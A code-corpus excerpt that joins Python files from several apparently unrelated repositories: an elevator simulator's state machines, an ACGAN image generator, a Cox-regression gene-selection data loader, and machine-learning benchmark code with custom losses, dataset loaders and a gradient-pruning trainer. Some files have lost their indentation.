self.write_log(self.get_sim_time(), self.get_real_time(), "Floor_" + str(self.door.id), "RequestProc", "S", "oReq", msg)
if __name__ == '__main__':
    f = Floor(0, None, None, None)
f.main()
```
#### File: 3ndG4me/ElevatorSim/Motor.py
```python
from ElevatorComponent import ElevatorComponent
from Messages import *
class STATE(Enum):
"""
States used exclusively by Motor
"""
PASSIVE = "passive"
BUSY = "busy"
class Motor(ElevatorComponent):
def __init__(self, CarCtrl):
super().__init__()
# input
self.IN = None # Received from Car Controller
# output
self.OUT = None # Recipient is Car Controller
# Coupled Input/Output: Sends and receives from Car Controller so an instance of the controller is needed
self.ctrl = CarCtrl
# component vars
self.state = STATE.PASSIVE # initialize in PASSIVE state
def state_processor(self):
while True:
if self.state == STATE.PASSIVE:
# in ? job && job != null
# Above Met: MoveTo STATE.BUSY
self.IN = self.ctrl.oMotor
# Generate IN log
if(self.IN):
self.write_log(self.get_sim_time(), self.get_real_time(),"Elevator Ctrl","Motor","R","in",self.IN)
if(self.IN.contents["value"] == StatusMotor.MOTOR_MOVING):
self.state = STATE.BUSY
# Generate Status log
self.write_log(self.get_sim_time(), self.get_real_time(),"Motor","","C","",self.IN)
elif(self.IN.contents["value"] == StatusMotor.MOTOR_REACHED):
self.write_log(self.get_sim_time(), self.get_real_time(),"Motor","","C","",self.IN)
elif self.state == STATE.BUSY:
# Send message MsgMotor -> OUT
self.OUT = MsgMotor("out", StatusMotor.MOTOR_MOVING)
self.ctrl.setiMotor(self.OUT)
# Generate OUT log
self.write_log(self.get_sim_time(), self.get_real_time(),"Motor","Elevator Ctrl","S","out",self.OUT)
# MoveTo STATE.PASSIVE
self.state = STATE.PASSIVE
def main(self):
self.state_processor()
if __name__ == '__main__':
ctrl = None
motor = Motor(ctrl)
motor.main()
``` |
{
"source": "3neutronstar/ACGAN-PyTorch",
"score": 3
} |
#### File: 3neutronstar/ACGAN-PyTorch/generate_image.py
```python
from __future__ import print_function
import argparse
import os
import numpy as np
import random
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
from utils import denormalize, weights_init, compute_acc
from network import _netG, _netD, _netD_CIFAR10, _netG_CIFAR10
from folder import ImageFolder
import tqdm
import torchvision.utils as vutils
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--dataset', required=True, help='cifar10 | imagenet')
parser.add_argument('--nz', type=int, default=110, help='size of the latent z vector')
parser.add_argument('--eval_epoch', type=int, default=None)
parser.add_argument('--cuda', action='store_true', help='enables cuda')
parser.add_argument('--ngpu', type=int, default=1, help='number of GPUs to use')
parser.add_argument('--n_images', type=int, default=1, help='number of images you want to generate')
parser.add_argument('--outf', default='./training_data', help='folder to output images and model checkpoints')
parser.add_argument('--gpu_id', type=int, default=0, help='The ID of the specified GPU')
parser.add_argument('--manualSeed', type=int,default=0, help='manual seed')
parser.add_argument('--num_classes', type=int, default=10, help='Number of classes for AC-GAN')
opt = parser.parse_args()
# specify the gpu id if using only 1 gpu
if opt.ngpu == 1:
os.environ['CUDA_VISIBLE_DEVICES'] = str(opt.gpu_id)
try:
os.makedirs(opt.outf)
except OSError:
pass
if opt.manualSeed is None:
opt.manualSeed = random.randint(1, 10000)
print("Random Seed: ", opt.manualSeed)
random.seed(opt.manualSeed)
torch.manual_seed(opt.manualSeed)
if opt.cuda:
torch.cuda.manual_seed_all(opt.manualSeed)
cudnn.benchmark = True
if torch.cuda.is_available() and not opt.cuda:
print("WARNING: You have a CUDA device, so you should probably run with --cuda")
# some hyper parameters
ngpu = int(opt.ngpu)
nz = int(opt.nz)
num_classes = int(opt.num_classes)
# Define the generator and initialize the weights
if opt.dataset == 'imagenet':
netG = _netG(ngpu, nz)
else:
netG = _netG_CIFAR10(ngpu, nz)
if opt.dataset == 'imagenet':
netD = _netD(ngpu, num_classes)
else:
netD = _netD_CIFAR10(ngpu, num_classes)
    try:
        netG_state_dict = torch.load(os.path.join(opt.outf, f'netG_epoch_{opt.eval_epoch}.pth'))
        netD_state_dict = torch.load(os.path.join(opt.outf, f'netD_epoch_{opt.eval_epoch}.pth'))
        netG.load_state_dict(netG_state_dict)
        netD.load_state_dict(netD_state_dict)
    except FileNotFoundError as e:
        raise FileNotFoundError(
            f'no checkpoint for epoch {opt.eval_epoch} found in {opt.outf}') from e
noise = torch.FloatTensor(1, nz, 1, 1)
aux_label = torch.LongTensor(1)
if opt.cuda:
netG.cuda()
netD.cuda()
noise,aux_label=noise.cuda(),aux_label.cuda()
num_generated_images=[0 for _ in range(num_classes)]
i=0
if not os.path.exists(os.path.join(opt.outf,'gen_images')):
os.mkdir(os.path.join(opt.outf,'gen_images'))
for cls_gen in range(num_classes):
if not os.path.exists(os.path.join(opt.outf,'gen_images',f'c{cls_gen}')):
os.mkdir(os.path.join(opt.outf,'gen_images',f'c{cls_gen}'))
while sum(num_generated_images)<opt.n_images:
cls_gen=i%num_classes # which class you want to generate
if num_generated_images[cls_gen]<=(opt.n_images//num_classes):
class_onehot = np.zeros(num_classes)
class_onehot[cls_gen]=1
noise_ = np.random.normal(0, 1, (1, nz))
noise_[0,:num_classes] = class_onehot
noise_ = (torch.from_numpy(noise_))
noise.data.copy_(noise_.view(1, nz, 1, 1))
fake = netG(noise)
if torch.argmax(netD(fake)[1])==cls_gen:
print(f'\r [{sum(num_generated_images)}/{opt.n_images}] saving images complete',end='')
#save image
vutils.save_image(denormalize(fake,opt.dataset).squeeze(0),os.path.join(opt.outf,'gen_images',f'c{cls_gen}',f'{i}.png'))
num_generated_images[cls_gen]+=1
else:
print(f'fail to save class {cls_gen} when i is {i}')
i+=1
if __name__=='__main__':
main()
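# Example invocation (illustrative; the checkpoint epoch and folder are assumptions):
#   python generate_image.py --dataset cifar10 --cuda --eval_epoch 499 \
#       --n_images 100 --outf ./training_data
# generated images land in <outf>/gen_images/c<class>/<i>.png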
``` |
{
"source": "3neutronstar/DHP",
"score": 3
} |
#### File: 3neutronstar/DHP/Dataloader.py
```python
import pandas as pd
import os
from lifelines import CoxPHFitter
from lifelines.utils import k_fold_cross_validation
import numpy as np
class Dataloader(object):
def __init__(self):
self.data = self._load_csv()
def _filter_method(self,data):
        '''
        Build the gene ordering (filtering index) based on Cox
        proportional-hazards p-values.
        '''
cox = CoxPHFitter()
#fitting
total=data['total']
gene=data['gene']
all=pd.concat([total,gene],axis=1)
cox.fit(all, duration_col='time', event_col='event', show_progress=True)
df=cox.summary
df=df.loc[df.index.isin([f'G{i}' for i in range(1,301)])]
i=df.sort_values(by=['-log2(p)'],ascending=False)
index=i.index
# #cross-validation
# cox_cv_result = k_fold_cross_validation(cox, all, duration_col='time', event_col='event', k=5,seed=0)
# print('C-index(cross-validation) = ', np.mean(cox_cv_result))
print(list(index))
return index
def _load_csv(self, data_dir="datasets"):
cur_dir = os.getcwd()
data_dir_path = os.path.join(cur_dir, data_dir)
data = {}
csv_name = {
"clinic": "Clinical_Variables.csv",
"gene": "Genetic_alterations.csv",
"treatment": "Treatment.csv",
"survival": "Survival_time_event.csv",
"total": "Total_data.csv"
}
for type, name in csv_name.items():
csv_path = os.path.join(data_dir_path, name)
data[type] = pd.read_csv(csv_path, index_col=0)
self.gene_p_value_arg_min = self._filter_method(data)
# self.gene_p_value_arg_min=[f'G{i}' for i in range(1,301)]
# self.gene_p_value_arg_min = ['G75', 'G173', 'G192', 'G27', 'G202', 'G63', 'G179', 'G260', 'G65', 'G1', 'G177', 'G96',
# 'G93', 'G175', 'G186', 'G122', 'G145', 'G53', 'G281', 'G14', 'G154', 'G25', 'G139',
# 'G9', 'G272', 'G112', 'G89', 'G167', 'G200', 'G20', 'G224', 'G55', 'G257', 'G269',
# 'G249', 'G246', 'G210', 'G238', 'G231', 'G88', 'G190', 'G103', 'G265', 'G68', 'G262',
# 'G24', 'G199', 'G2', 'G125', 'G289', 'G128', 'G124', 'G230', 'G254', 'G263', 'G18',
# 'G150', 'G73', 'G44', 'G287', 'G64', 'G148', 'G49', 'G52', 'G130', 'G212', 'G156',
# 'G225', 'G271', 'G188', 'G90', 'G66', 'G236', 'G19', 'G133', 'G165', 'G227', 'G161',
# 'G108', 'G195', 'G250', 'G244', 'G159', 'G292', 'G208', 'G37', 'G217', 'G8', 'G129',
# 'G290', 'G203', 'G118', 'G300', 'G248', 'G171', 'G256', 'G70', 'G107', 'G226', 'G283',
# 'G149', 'G168', 'G30', 'G278', 'G115', 'G242', 'G211', 'G113', 'G60', 'G82', 'G97',
# 'G205', 'G126', 'G209', 'G239', 'G132', 'G17', 'G172', 'G144', 'G213', 'G215', 'G32',
# 'G41', 'G245', 'G261', 'G163', 'G80', 'G94', 'G234', 'G174', 'G59', 'G7', 'G74', 'G298',
# 'G233', 'G3', 'G232', 'G201', 'G84', 'G136', 'G99', 'G162', 'G21', 'G50', 'G134',
# 'G140', 'G219', 'G178', 'G38', 'G120', 'G153', 'G237', 'G189', 'G282', 'G214', 'G176',
# 'G61', 'G117', 'G76', 'G40', 'G276', 'G152', 'G77', 'G274', 'G160', 'G111', 'G34',
# 'G102', 'G155', 'G5', 'G297', 'G56', 'G295', 'G222', 'G47', 'G35', 'G11', 'G101', 'G46',
# 'G268', 'G137', 'G286', 'G240', 'G92', 'G43', 'G62', 'G135', 'G157', 'G299', 'G100',
# 'G16', 'G143', 'G218', 'G36', 'G86', 'G4', 'G264', 'G296', 'G147', 'G69', 'G72', 'G81',
# 'G259', 'G164', 'G141', 'G131', 'G85', 'G247', 'G26', 'G196', 'G6', 'G51', 'G71',
# 'G181', 'G57', 'G184', 'G13', 'G228', 'G221', 'G284', 'G294', 'G216', 'G31', 'G151',
# 'G67', 'G191', 'G87', 'G116', 'G252', 'G33', 'G123', 'G170', 'G54', 'G48', 'G28',
# 'G206', 'G104', 'G279', 'G229', 'G158', 'G79', 'G291', 'G106', 'G255', 'G110', 'G266',
# 'G223', 'G235', 'G198', 'G91', 'G243', 'G204', 'G12', 'G169', 'G288', 'G197', 'G23',
# 'G119', 'G183', 'G220', 'G251', 'G241', 'G95', 'G42', 'G267', 'G185', 'G207', 'G285',
# 'G105', 'G127', 'G182', 'G180', 'G146', 'G10', 'G98', 'G193', 'G58', 'G258', 'G187',
# 'G275', 'G166', 'G280', 'G83', 'G270', 'G277', 'G78', 'G22', 'G142', 'G15', 'G114',
# 'G45', 'G293', 'G253', 'G29', 'G109', 'G121', 'G138', 'G39', 'G194', 'G273']
return data
def get_k_gene(self, gene_select_num):
        '''
        :param gene_select_num: number of genes to select
        :return: gene data of all patients, restricted to the gene_select_num
                 genes with the smallest p-values (most significant first)
        '''
new_order_data = self.data['gene'][self.gene_p_value_arg_min[:gene_select_num]]
return new_order_data
def get_event(self):
return self.data['survival']['event']
def get_treatment(self):
return self.data['treatment']['Treatment']
def get_survival_time(self):
return self.data['survival']['time']
def get_clinic_var(self):
return self.data['clinic']
if __name__ == '__main__':
dl = Dataloader()
print(dl.get_k_gene(300))
``` |
{
"source": "3neutronstar/ml_benchmark",
"score": 3
} |
#### File: ml_benchmark/CustomLoss/crossentropyloss.py
```python
import torch
from CustomLoss.baseloss import BaseLoss
import torch.nn.functional as F
import torch.nn as nn
class CrossEntropyLoss(nn.Module):
def __init__(self, custom_loss_reduction):
super(CrossEntropyLoss,self).__init__()
self.custom_loss_reduction=custom_loss_reduction
def forward(self,prediction,target):
crossentropy=torch.diagonal(torch.matmul(-F.log_softmax(prediction,dim=1),target.T))
if self.custom_loss_reduction=='mean':
crossentropy=crossentropy.mean()
elif self.custom_loss_reduction=='sum':
crossentropy=crossentropy.sum()
return crossentropy
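# Example (illustrative): unlike nn.CrossEntropyLoss, this variant expects a
# one-hot (or soft) target matrix rather than class indices:
#   pred = torch.randn(4, 10)
#   onehot = F.one_hot(torch.arange(4), num_classes=10).float()
#   loss = CrossEntropyLoss(custom_loss_reduction='mean')(pred, onehot)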
class ModifyTargetCrossEntropyLoss(BaseLoss):
def __init__(self, classification_criterion,custom_loss_reduction, reduction):
super(ModifyTargetCrossEntropyLoss,self).__init__(classification_criterion, reduction=reduction)
self.custom_loss_reduction=custom_loss_reduction
self.modify_target_criterion=CrossEntropyLoss(custom_loss_reduction)
def forward(self,prediction,target):
#basic
classification_loss=self.classification_criterion(prediction,target)
#custom
modifytarget=torch.zeros_like(prediction)
target_index=torch.ones_like(target).unsqueeze(-1).cumsum(dim=0)-1
target=target.unsqueeze(-1)
        modifytarget[target_index,target] = 1  # mark the true class
modifytarget_loss=self.modify_target_criterion(prediction,modifytarget)
loss=classification_loss+modifytarget_loss
return loss
def covariance_loss(logits, labels, T, device):
bsz, n_cats, n_heads = logits.size()
if n_heads < 2:
return 0
all_probs = torch.softmax(logits/T, dim=1)
label_inds = torch.ones(bsz, n_cats).cuda(device)
label_inds[range(bsz), labels] = 0
# removing the ground truth prob
probs = all_probs * label_inds.unsqueeze(-1).detach()
# re-normalize such that probs sum to 1
#probs /= (all_probs.sum(dim=1, keepdim=True) + 1e-8)
probs = (torch.softmax(logits/T, dim=1) + 1e-8)
# cosine regularization
    #### the two lines below mean-center and L2-normalize the probabilities
probs -= probs.mean(dim=1, keepdim=True)
probs = probs / torch.sqrt(((probs ** 2).sum(dim=1, keepdim=True) + 1e-8))
####
#probs = probs / torch.sqrt(((all_probs ** 2).sum(dim=1, keepdim=True) + 1e-8))
cov_mat = torch.einsum('ijk,ijl->ikl', probs, probs)
pairwise_inds = 1 - torch.eye(n_heads).cuda(device)
den = bsz * (n_heads -1) * n_heads
loss = ((cov_mat * pairwise_inds).abs().sum() / den)
return loss
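# Shape note (illustrative): logits are per-head predictions of shape
# (batch, n_cats, n_heads); the loss penalizes correlated non-ground-truth
# probabilities across the heads, e.g.
#   logits = torch.randn(8, 10, 3); labels = torch.randint(0, 10, (8,))
#   reg = covariance_loss(logits, labels, T=1.0, device=0)  # requires CUDA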
```
#### File: ml_benchmark/Dataset/dataset.py
```python
import os
import sys
import torch
import torchvision.transforms as transforms
from torchvision import datasets
from six.moves import urllib
from Dataset.preprocess import *
def load_dataset(configs):
if sys.platform=='linux':
dataset_path='../data/dataset'
elif sys.platform=='win32':
        dataset_path = '..\\data\\dataset'
else:
dataset_path='../data/dataset'
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
urllib.request.install_opener(opener)
if configs['dataset'] == 'mnist':
transform = transforms.Compose(
[transforms.Resize((32, 32)),
transforms.ToTensor(),
transforms.Normalize((0.1307,), (0.3081,))])
train_data = datasets.MNIST(root=dataset_path, train=True,
download=True, transform=transform)
test_data = datasets.MNIST(root=dataset_path, train=False,
download=False, transform=transform)
elif configs['dataset'] == 'cifar100':
normalize = transforms.Normalize(mean=[0.4914, 0.4822, 0.4465],
std=[0.2023, 0.1994, 0.2010])
train_transform = transforms.Compose([
transforms.Pad(4),
transforms.RandomCrop(32),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
])
test_transform=transforms.Compose([
transforms.ToTensor(),
normalize,
])
        train_data = datasets.CIFAR100(root=os.path.join(dataset_path, 'cifar100'), train=True,
                                       download=True, transform=train_transform)
        test_data = datasets.CIFAR100(root=os.path.join(dataset_path, 'cifar100'), train=False,
                                      download=False, transform=test_transform)
elif configs['dataset'] == 'cifar10':
normalize = transforms.Normalize(mean=[0.4914, 0.4822, 0.4465],
std=[0.2023, 0.1994, 0.2010])
train_transform=transforms.Compose([
transforms.Pad(4),
transforms.RandomCrop(32),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,
])
test_transform=transforms.Compose([
transforms.ToTensor(),
normalize,
])
        train_data = datasets.CIFAR10(root=os.path.join(dataset_path, 'cifar10'), train=True,
                                      download=True, transform=train_transform)
        test_data = datasets.CIFAR10(root=os.path.join(dataset_path, 'cifar10'), train=False,
                                     download=False, transform=test_transform)
elif configs['dataset']=='fashionmnist':
train_transform=transforms.Compose([
transforms.Resize((32, 32)),
transforms.ToTensor(),
transforms.Normalize((0.5,), (0.5,))
])
test_transform=transforms.Compose([
transforms.Resize((32, 32)),
transforms.ToTensor(),
transforms.Normalize((0.5,), (0.5,))
])
train_data=datasets.FashionMNIST(root=dataset_path, download=True, train=True, transform=train_transform)
test_data=datasets.FashionMNIST(root=dataset_path, download=False, train=False, transform=test_transform)
else:
raise NotImplementedError
return train_data, test_data
```
#### File: ml_benchmark/Learner/base_learner.py
```python
import torch
from Dataset.dataload import data_loader
import pickle
import torch.nn as nn
import torch.optim as optim
from torch.optim import lr_scheduler
from torch.utils.tensorboard import SummaryWriter
from six.moves import urllib
import os
from utils import EarlyStopping
import time
import numpy as np
import matplotlib.pyplot as plt
from CustomOptimizer.pcgrad import *
from CustomLoss.crossentropyloss import CrossEntropyLoss,ModifyTargetCrossEntropyLoss
CUSTOM_LOSS={
'crossentropy':CrossEntropyLoss,
'modifytargetcrossentropy':ModifyTargetCrossEntropyLoss,
}
class BaseLearner():
def __init__(self,model,time_data,file_path,configs):
self.model = model
self.optimizer = self.model.optim
if 'train_moo' == configs['mode']:
reduction='none'
self.optimizer=PCGrad_MOO(self.optimizer)
elif 'train_moo_v2' == configs['mode']:
reduction='none'
self.optimizer=PCGrad_MOO_V2(self.optimizer)
elif 'baseline_moo' == configs['mode']:
reduction='mean'
self.optimizer=PCGrad_MOO_Baseline(self.optimizer)
elif 'baseline_moo_v2' == configs['mode']: #충돌 확인용
reduction='none'
self.optimizer=PCGrad_MOO_Baseline_V2(self.optimizer)
elif 'baseline_moo_v3' == configs['mode']: #충돌 확인용
reduction='none'
self.optimizer=PCGrad_MOO_Baseline_V3(self.optimizer)
elif configs['mode']=='train_mtl':
self.optimizer=PCGrad(self.optimizer)
reduction='none'
elif configs['mode']=='train_mtl_v2':
self.optimizer=PCGrad_v2(self.optimizer)
reduction='none'
else:
reduction='mean'
if configs['custom_loss']==None:
self.criterion = self.model.loss
self.criterion=self.criterion.__class__(reduction=reduction) # grad vector (no scalar)
else:
if 'custom_loss_reduction' not in configs.keys():
custom_loss_reduction='mean'
else:
custom_loss_reduction=configs['custom_loss_reduction']
self.criterion=CUSTOM_LOSS[configs['custom_loss']](self.model.loss,custom_loss_reduction=custom_loss_reduction,reduction=reduction)
self.scheduler = self.model.scheduler
self.configs = configs
self.grad_list = list()
if configs['batch_size']==128 or configs['batch_size']==64:
self.log_interval=50
        elif configs['batch_size'] <= 32:
self.log_interval=100
else:
print("Use Default log interval")
self.log_interval=100
self.device = self.configs['device']
# data
opener = urllib.request.build_opener()
opener.addheaders = [('User-agent', 'Mozilla/5.0')]
urllib.request.install_opener(opener)
self.train_loader, self.test_loader = data_loader(self.configs)
# Tensorboard
self.current_path = file_path
self.logWriter = SummaryWriter(os.path.join(
self.current_path, 'training_data', time_data))
self.time_data = time_data
self.early_stopping = EarlyStopping(
self.current_path, time_data, configs, patience=self.configs['patience'], verbose=True)
if self.configs['colab'] == True:
self.making_path = os.path.join('drive', 'MyDrive', 'grad_data')
else:
self.making_path = os.path.join(self.current_path, 'grad_data')
if os.path.exists(self.making_path) == False:
os.mkdir(self.making_path)
if os.path.exists(os.path.join(self.making_path, 'tmp')) == False:
os.mkdir(os.path.join(self.making_path, 'tmp'))
# grad list
self.grad_list = list()
def save_grad(self, epochs):
# Save all grad to the file
if self.configs['grad_save'] == True:
self.grad_list.append([])
param_size = list()
params_write = list()
tik = time.time()
if self.configs['model'] == 'lenet300_100' or self.configs['model']=='lenet5':#lenet300 100
for t, params in enumerate(self.grad_list):
if t == 1:
                    for i, p in enumerate(params):  # params of each layer
param_size.append(p.size())
# elem
params_write.append(torch.cat(params, dim=0).unsqueeze(0))
# node
if t % 100 == 0:
print("\r step {} done".format(t), end='')
# elif self.configs['model'] == 'lenet5': #TODO
# for t, params in enumerate(self.grad_list):
# if t == 1:
# for i, p in enumerate(params): # 각 layer의 params
# param_size.append(p.size())
# # elem
# # print(params)
# params_write.append(torch.cat(params, dim=0).unsqueeze(0))
# # node
# if t % 100 == 0:
# print("\r step {} done".format(t), end='')
else: # vgg16
import platform
for epoch in range(1,epochs+1):
i = 0
epoch_data = list()
# check exist
while os.path.exists(os.path.join(self.making_path, 'tmp', '{}_{}e_{}.npy'.format(self.time_data, epoch, i))) == True:
batch_idx_data = np.load(os.path.join(
self.making_path, 'tmp', '{}_{}e_{}.npy'.format(self.time_data, epoch, i)))
epoch_data.append(torch.from_numpy(batch_idx_data))
i += 1
params_write.append(torch.cat(epoch_data, dim=0))
print("\r {}epoch processing done".format(epoch),end='')
print("\n")
write_data = torch.cat(params_write, dim=0)
if self.configs['model'] != 'lenet300_100' and self.configs['model']!='lenet5':
for epoch in range(1,epochs+1):
i = 0
epoch_data = list()
# check exist
while os.path.exists(os.path.join(self.making_path, 'tmp', '{}_{}e_{}.npy'.format(self.time_data, epoch, i))) == True:
# remove
if platform.system() == 'Windows':
os.system('del {}'.format(os.path.join(
self.making_path, 'tmp', '{}_{}e_{}.npy'.format(self.time_data, epoch, i))))
else:
os.system('rm {}'.format(os.path.join(
self.making_path, 'tmp', '{}_{}e_{}.npy'.format(self.time_data, epoch, i))))
i+=1
print("\r {}epoch processing done".format(epoch),end='')
print("\n Write data size:", write_data.size())
np.save(os.path.join(self.making_path, 'grad_{}'.format(
self.time_data)), write_data.numpy()) # npy save
tok = time.time()
print('play_time for saving:', tok-tik, "s")
print('size: {}'.format(len(params_write)))
'''
Save params
'''
return self.configs
def _save_grad(self, p_groups, epoch, batch_idx):
# save grad to the list
if self.configs['grad_save'] == True:
save_grad_list = list()
for p in p_groups:
for l, p_layers in enumerate(p['params']):
# node, rest
if self.configs['model'] == 'lenet300_100' or self.configs['model']=='lenet5':
if len(p_layers.size()) > 1: # weight filtering
p_nodes = p_layers.grad.cpu().detach().clone()
# print(p_nodes.size())
for n, p_node in enumerate(p_nodes):
self.grad_list[-1].append(torch.cat([p_node.mean().view(-1), p_node.norm(
).view(-1), torch.nan_to_num(p_node.var()).view(-1)], dim=0).unsqueeze(0))
# elif self.configs['model'] == 'lenet5':#TODO
# if len(p_layers.size()) > 1: # weight filtering
# p_node = p_layers.grad.view(
# -1).cpu().detach().clone()
# # if i==0:
# # print(p_node[50:75])
# # print(p_node.size())
# self.grad_list[-1].append(p_node)
else: # vgg
if len(p_layers.size()) > 1:
p_nodes = p_layers.grad.cpu().detach().clone()
for n, p_node in enumerate(p_nodes):
save_grad_list.append(torch.cat([p_node.mean().view(-1), p_node.norm(
).view(-1), torch.nan_to_num(p_node.var()).view(-1)], dim=0).unsqueeze(0))
p_layers.to(self.device)
if 'lenet' not in self.configs['model']:
npy_path = os.path.join(self.making_path, 'tmp', '{}_{}e_{}.npy'.format(
self.time_data, epoch, batch_idx))
row_data = torch.cat(save_grad_list, dim=0).unsqueeze(0)
np.save(npy_path, row_data.numpy())
del save_grad_list
del row_data
def _show_grad(self,output, target,p_groups,epochs,batch_idx):
if batch_idx%100==0:
criterion=nn.CrossEntropyLoss(reduction='none')
self.optimizer.zero_grad()
loss=criterion(output, target)
flatten_grads=list()
for l in loss:
flatten_grad=list()
l.backward(retain_graph=True)
for params in p_groups:
for p in params['params']:
flatten_grad.append(p.grad.view(-1))
flatten_grad=torch.cat(flatten_grad,dim=0)
flatten_grads.append(flatten_grad.norm().cpu())
plt.clf()
plt.plot(flatten_grads,flatten_grads,'bo')
plt.xlabel('no_pcgrad')
plt.ylabel('no_pcgrad')
plt.title('no_pcgrad norm (batch size: {})'.format(self.configs['batch_size']))
plt.savefig('./grad_data/png/no_pcgrad/{}batch_{}e_{}i.png'.format(self.configs['batch_size'],epochs,batch_idx))
criterion=nn.CrossEntropyLoss(reduction='mean')
self.optimizer.zero_grad()
loss=criterion(output,target)
loss.backward()
```
#### File: ml_benchmark/Learner/classic_learner.py
```python
import time
import os
import time
import numpy as np
import torch
from Learner.base_learner import BaseLearner
import sys
class ClassicLearner(BaseLearner):
def __init__(self, model, time_data,file_path, configs):
super(ClassicLearner,self).__init__(model,time_data,file_path,configs)
# pruning
if configs['mode']=='train_weight_prune':
self.grad_off_mask = list()
self.grad_norm_cum = dict()
for l, num_nodes in enumerate(self.model.node_size_list):
for n in range(num_nodes):
self.grad_norm_cum['{}l_{}n'.format(l, n)] = 0.0
self.grad_off_mask.append(torch.zeros(
                    num_nodes, dtype=torch.bool, device=self.device))  # mask that zeroes out gradients
            # track how often gradients get turned off
            self.grad_off_freq_cum = 0
            # epoch at which gradients start being turned off
            self.grad_turn_off_epoch = self.configs['grad_off_epoch']
            # # nodes to turn back on
self.grad_turn_on_dict=None
# self.grad_turn_on_dict = {
# 2: [0, 31, 58, 68, 73]
# # 3:[2,12,27,31,50,82]
# }
print(self.grad_turn_on_dict)
def run(self):
print("Training {} epochs".format(self.configs['epochs']))
eval_accuracy, eval_loss = 0.0, 0.0
train_accuracy, train_loss = 0.0, 0.0
best_eval_accuracy=0.0
# Train
for epoch in range(self.configs['start_epoch'], self.configs['epochs'] + 1):
train_accuracy, train_loss = self._train(epoch)
eval_accuracy, eval_loss = self._eval()
self.scheduler.step()
loss_dict = {'train': train_loss, 'eval': eval_loss}
accuracy_dict = {'train': train_accuracy, 'eval': eval_accuracy}
self.logWriter.add_scalars('loss', loss_dict, epoch)
self.logWriter.add_scalars('accuracy', accuracy_dict, epoch)
self.early_stopping(eval_loss, self.model)
if self.early_stopping.early_stop:
print("Early stopping")
break
if self.device == 'cuda':
torch.cuda.empty_cache()
if best_eval_accuracy<eval_accuracy:
best_eval_accuracy=eval_accuracy
print("Best Accuracy in evaluation: {:.2f}".format(best_eval_accuracy) )
if self.configs['mode'] == 'train_weight_prune':
print("before prune")
for layer in self.optimizer.param_groups[0]['params']:
print(layer.size())
print("after prune")
for mask_layer in self.grad_off_mask:
print("Pruned weight", torch.nonzero(mask_layer).size())
for layer in self.optimizer.param_groups[0]['params']:
print("After Weight Prune", torch.nonzero(layer).size())
configs = self.save_grad(epoch)
return configs
def _train(self, epoch):
tik = time.time()
        self.model.train()  # set train mode
running_loss = 0.0
correct = 0
num_training_data = len(self.train_loader.dataset)
        # the default loss reduction is the mean over mini-batch samples
        # the loss function already applies softmax internally
        # the loader yields batch_size samples at a time; enumerate exposes batch_idx
p_groups=self.optimizer.param_groups
for batch_idx, (data, target) in enumerate(self.train_loader):
            data, target = data.to(self.device), target.to(
                self.device)  # move to gpu
            self.optimizer.zero_grad()  # reset gradients to zero
# weight prune #TODO
self.prune_weight(p_groups,epoch,batch_idx)
            # the model maps a whole batch of inputs to a batch of outputs (not one input to one output)
            output = self.model(data)
            loss = self.criterion(output, target)  # compare predictions against targets
# get the index of the max log-probability
pred = output.argmax(dim=1, keepdim=True)
correct += pred.eq(target.view_as(pred)).sum().item()
            loss.backward(retain_graph=True)  # backpropagation
            p_groups = self.optimizer.param_groups  # each group holds the per-layer parameters
# show grad
#self._show_grad(output, target,p_groups,epoch,batch_idx)
# visual grad
self._save_conflict_grad(p_groups,epoch,target)
# grad prune
self._prune_grad(p_groups, epoch, batch_idx)
            # save grads (after pruning)
            self._save_grad(p_groups, epoch, batch_idx)
            # optimizer step after pruning
            self.optimizer.step()
running_loss += loss.item()
if batch_idx % self.log_interval == 0:
print('\r Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(epoch, batch_idx * len(
data), num_training_data, 100.0 * batch_idx / len(self.train_loader), loss.item()), end='')
if self.configs['log_extraction']=='true':
sys.stdout.flush()
running_loss /= num_training_data
tok = time.time()
running_accuracy = 100.0 * correct / float(num_training_data)
print('\nTrain Loss: {:.6f}'.format(running_loss), 'Learning Time: {:.1f}s'.format(
tok-tik), 'Accuracy: {}/{} ({:.2f}%)'.format(correct, num_training_data, 100.0*correct/num_training_data))
return running_accuracy, running_loss
def _eval(self):
self.model.eval()
eval_loss = 0
correct = 0
class_correct_dict=dict()
class_total_dict=dict()
for i in range(self.configs['num_classes']):
class_correct_dict[i]=0
class_total_dict[i]=0
with torch.no_grad():
for data, target in self.test_loader:
data, target = data.to(self.device), target.to(self.device)
output = self.model(data)
loss = self.criterion(output, target)
eval_loss += loss.item()
# get the index of the max log-probability
pred = output.argmax(dim=1, keepdim=True)
correct += pred.eq(target.view_as(pred)).sum().item()
for label in target.unique():
# print(label,pred.eq(target.view_as(pred))[target==label].sum().item())
class_correct_dict[int(label)]+=pred.eq(target.view_as(pred))[target==int(label)].sum().item()
class_total_dict[int(label)]+=(target==label).sum().item()
for keys in class_correct_dict.keys():
print('{} class : {}/{} [{:.2f}%]'.format(keys,class_correct_dict[keys],class_total_dict[keys],100.0*class_correct_dict[keys]/class_total_dict[keys]))
eval_loss = eval_loss / len(self.test_loader.dataset)
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.2f}%)\n'.format(
eval_loss, correct, len(self.test_loader.dataset),
100.0 * correct / float(len(self.test_loader.dataset))))
if self.configs['log_extraction']=='true':
sys.stdout.flush()
eval_accuracy = 100.0*correct/float(len(self.test_loader.dataset))
return eval_accuracy, eval_loss
#########################################################################################################
###########################################################################################################
def _prune_grad(self, p_groups, epoch, batch_idx):
# pruning mask generator
        l = -1  # start at -1 so the first weight layer is indexed 0, skipping elements such as maxpooling
if self.configs['mode'] == 'train_weight_prune':
for p in p_groups:
for i, p_layers in enumerate(p['params']):
# first and last layer live
                    # or p['params'][0].size()==p_layers.size() or p['params'][1].size()==p_layers.size(): # the last layer is the output, so it is excluded
if p['params'][-1].size() == p_layers.size() or p['params'][-2].size() == p_layers.size():
continue
else:
# weight filtering
if len(p_layers.size()) > 1 and epoch <= self.grad_turn_off_epoch+1:
l += 1 # layer
p_nodes = p_layers.grad.cpu().detach().clone() # prune in grad
# p_nodes = p_layers.grad.cpu().detach().clone() # prune in weight
for n, p_node in enumerate(p_nodes):
                                # 1. prune every gradient whose cumulative norm stays below the threshold
